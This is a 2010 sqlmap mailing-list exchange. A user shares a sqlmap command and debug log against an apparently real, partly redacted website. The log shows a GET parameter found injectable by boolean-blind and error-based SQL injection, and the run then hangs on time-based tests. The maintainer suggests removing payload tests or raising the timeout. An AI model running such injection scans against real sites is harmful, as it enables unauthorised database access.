Re: [sqlmap-users] Some way to cancel others tests?
Brought to you by:
inquisb
Menu
▾
▴
Re: [sqlmap-users] Some way to cancel others tests?
|
From: Bernardo D. A. G. <ber...@gm...> - 2010-12-02 15:55:58
|
You can either remove tests from x/payloads.XML or I would suggest to set --timeout to an appropriate value, maybe 60 or 120 will do in your case. Bernardo Damele A. G. This message was sent from a smartphone On 1 Dec 2010, at 19:36, David Guimaraes <sk...@gm...> wrote: Is there any way to make sqlmap not conduct further tests on the site? (stacked, error, time-based, etc.). The problem is that during the identification of types of sqli allowed, it hangs on a test and terminates the program without allowing me to exploit the flaw. Example: Revision: 2468 $ ./sqlmap.py -u "http://www.vuln.xxx.br/path/vulnphp.php?vulnparam=1766" -p vulnparam --threads 20 --dbs -v 2 sqlmap/0.9-dev - automatic SQL injection and database takeover tool http://sqlmap.sourceforge.net [*] starting at: 17:23:43 [17:23:43] [DEBUG] cleaning up configuration parameters [17:23:43] [DEBUG] setting the HTTP timeout [17:23:43] [DEBUG] setting the HTTP method to GET [17:23:43] [DEBUG] setting the UNION query SQL injection range of columns [17:23:43] [DEBUG] creating HTTP requests opener object [17:23:43] [INFO] using '/home/xxx/sqlmap-dev/output/www.vuln.xxx.br/session' as session file [17:23:43] [INFO] testing connection to the target url [17:23:44] [WARNING] the testable parameter 'vulnparam' you provided is not into the Cookie [17:23:44] [INFO] testing if the url is stable, wait a few seconds [17:23:46] [INFO] url is stable [17:23:49] [INFO] heuristics shows that GET parameter 'vulnparam' might be injectable (possible DBMS: MySQL) [17:23:49] [INFO] testing sql injection on GET parameter 'vulnparam' [17:23:49] [INFO] testing 'AND boolean-based blind - WHERE clause' sqlmap got a 302 redirect to /home/l.php - What target address do you want to use from now on? http://www.vuln.xxx.br:80/path/vulnphp.php (default) or provide another target address based also on the redirection got from the application > [17:23:52] [DEBUG] setting match ratio for current parameter to default value 0.900 [17:23:58] [INFO] GET parameter 'vulnparam' is 'AND boolean-based blind - WHERE clause' injectable [17:23:58] [DEBUG] skipping test 'OR boolean-based blind - WHERE clause' because the risk is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL >= 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'MySQL < 5.0 boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Microsoft SQL Server/Sybase boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Oracle boolean-based blind - ORDER BY clause' because the level is higher than the provided [17:23:58] [DEBUG] skipping test 'Generic boolean-based blind - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:23:58] [INFO] testing 'MySQL >= 5.0 error-based - WHERE clause' [17:23:59] [INFO] GET parameter 'vulnparam' is 'MySQL >= 5.0 error-based - WHERE clause' injectable [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Oracle error-based - WHERE clause' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'MySQL >= 5.0 error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL error-based - GROUP BY and ORDER BY clauses' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle error-based - ORDER BY clause' because the level is higher than the provided [17:24:00] [INFO] testing 'MySQL > 5.0.11 stacked queries' [17:24:00] [DEBUG] skipping test 'MySQL < 5.0.12 stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL > 8.1 stacked queries' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - exists function' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'PostgreSQL < 8.2 stacked queries - Glibc' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Microsoft SQL Server/Sybase stacked queries' because the back-end DBMS identified is MySQL [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Oracle stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'SQLite > 2.0 stacked queries' because the level is higher than the provided [17:24:00] [DEBUG] skipping test 'Firebird stacked queries' because the level is higher than the provided [17:24:00] [INFO] testing 'MySQL > 5.0.11 AND time-based blind' [17:24:40] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:25:11] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:25:42] [CRITICAL] unable to connect to the target url or proxy, sqlmap is going to retry the request [17:26:13] [CRITICAL] unable to connect to the target url or proxy [*] shutting down at: 17:26:13 David ------------------------------------------------------------------------------ Increase Visibility of Your 3D Game App & Earn a Chance To Win $500! Tap into the largest installed PC base & get more eyes on your game by optimizing for Intel(R) Graphics Technology. Get started today with the Intel(R) Software Partner Program. Five $500 cash prizes are up for grabs. http://p.sf.net/sfu/intelisp-dev2dev _______________________________________________ sqlmap-users mailing list sql...@li... https://lists.sourceforge.net/lists/listinfo/sqlmap-users |
